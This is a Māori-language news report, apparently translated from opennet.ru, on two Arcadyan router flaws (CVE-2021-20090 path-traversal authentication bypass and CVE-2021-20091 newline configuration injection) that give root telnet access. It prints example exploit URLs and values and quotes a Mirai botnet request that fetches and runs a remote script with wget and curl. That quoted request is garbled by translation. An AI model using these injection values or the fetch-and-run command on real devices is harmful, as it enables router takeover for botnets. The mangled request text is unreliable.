Ko te whakaraerae i nga pouara kaainga e pa ana ki nga kaihanga 17

He whakaeke nui kua tuhia i runga i te whatunga ki nga kaitarai kaainga kei te whakamahi te firmware i te whakatinanatanga tūmau HTTP mai i te kamupene Arcadyan. Ki te whai mana whakahaere i runga i nga taputapu, ka whakamahia te whakakotahitanga o nga whakaraeraetanga e rua e taea ai te mahi mamao o te waehere whai mana me nga mana pakiaka. Ko te raru e pa ana ki te whanuitanga o nga pouara ADSL mai i Arcadyan, ASUS me Buffalo, me nga taputapu i tukuna i raro i nga tohu Beeline (kua whakapumautia te raruraru i roto i te Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone me etahi atu kaiwhakahaere waea. Kei te tohuhia ko te raru kei roto i te umanga a Arcadyan neke atu i te 10 tau, a i tenei wa kua kaha ki te heke ki te 20 nga tauira taputapu mai i nga kaihanga rereke 17.

Ko te whakaraeraetanga tuatahi, ko te CVE-2021-20090, ka taea te uru ki tetahi tuhinga atanga paetukutuku me te kore motuhēhēnga. Ko te ngako o te whakaraeraetanga ko te mea kei roto i te atanga paetukutuku, ko etahi raarangi ka tukuna nga whakaahua, nga konae CSS me nga tuhinga JavaScript ka taea te uru me te kore motuhēhēnga. I tenei keehi, ka tirohia nga raarangi mo te uru me te kore motuhēhēnga ma te whakamahi i te kanohi kanohi tuatahi. Ko te tautuhi i nga tohu "../" i roto i nga huarahi ki te haere ki te whaiaronga matua ka aukatihia e te firmware, engari ko te whakamahi i te "..%2f" ka pekehia. No reira, ka taea te whakatuwhera i nga wharangi kua tiakina ina tuku tono penei "http://192.168.1.1/images/..%2findex.htm".

Ko te whakaraerae tuarua, ko te CVE-2021-20091, ka taea e te kaiwhakamahi whakamotuhēhē te whakarereke i nga tautuhinga punaha o te taputapu ma te tuku i nga tawhā kua whakahōputuhia ki te tuhinga apply_abstract.cgi, e kore e tirohia mo te ahua o te tohu raina hou i roto i nga tawhā. . Hei tauira, i te wa e mahi ana i te mahi ping, ka taea e te kaiwhaiwhai te tohu i te uara "192.168.1.2%0AARC_SYS_TelnetdEnable=1" i roto i te mara me te wahitau IP e tirohia ana, me te tuhinga, i te wa e hanga ana i te konae tautuhinga /tmp/etc/config/ .glbcfg, ka tuhia te raina “AARC_SYS_TelnetdEnable=1” ki roto ", ka whakahohe i te tūmau telnetd, e whakarato ana i te urunga anga whakahau kore here me nga mana pakiaka. Waihoki, ma te tautuhi i te tawhā AARC_SYS, ka taea e koe te mahi i tetahi waehere i runga i te punaha. Ko te whakaraeraetanga tuatahi ka taea te whakahaere i tetahi tuhinga raru me te kore motuhēhēnga mā te uru atu hei “/images/..%2fapply_abstract.cgi”.

Hei whakamahi i nga whakaraeraetanga, me taea e te kaitukino te tuku tono ki te tauranga whatunga kei te whakahaere te atanga tukutuku. Ma te whakatau i te kaha o te horapa o te whakaeke, he maha nga kaiwhakahaere e whakarere ana i te uru ki o raatau taputapu mai i te whatunga o waho ki te ngawari ki te whakatau i nga raru e te ratonga tautoko. Mena he iti noa te uru ki te atanga ki te whatunga o roto, ka taea te whakaeke mai i te whatunga o waho ma te whakamahi i te tikanga "DNS rebinding". Kei te kaha te whakamahi i nga whakaraeraetanga hei hono i nga pouara ki te botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Hononga: kati Kaiwhakamahi-Kaiwhakamahi: Mahi pouri=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Momo=XNUMX

Source: opennet.ru

Tāpiri i te kōrero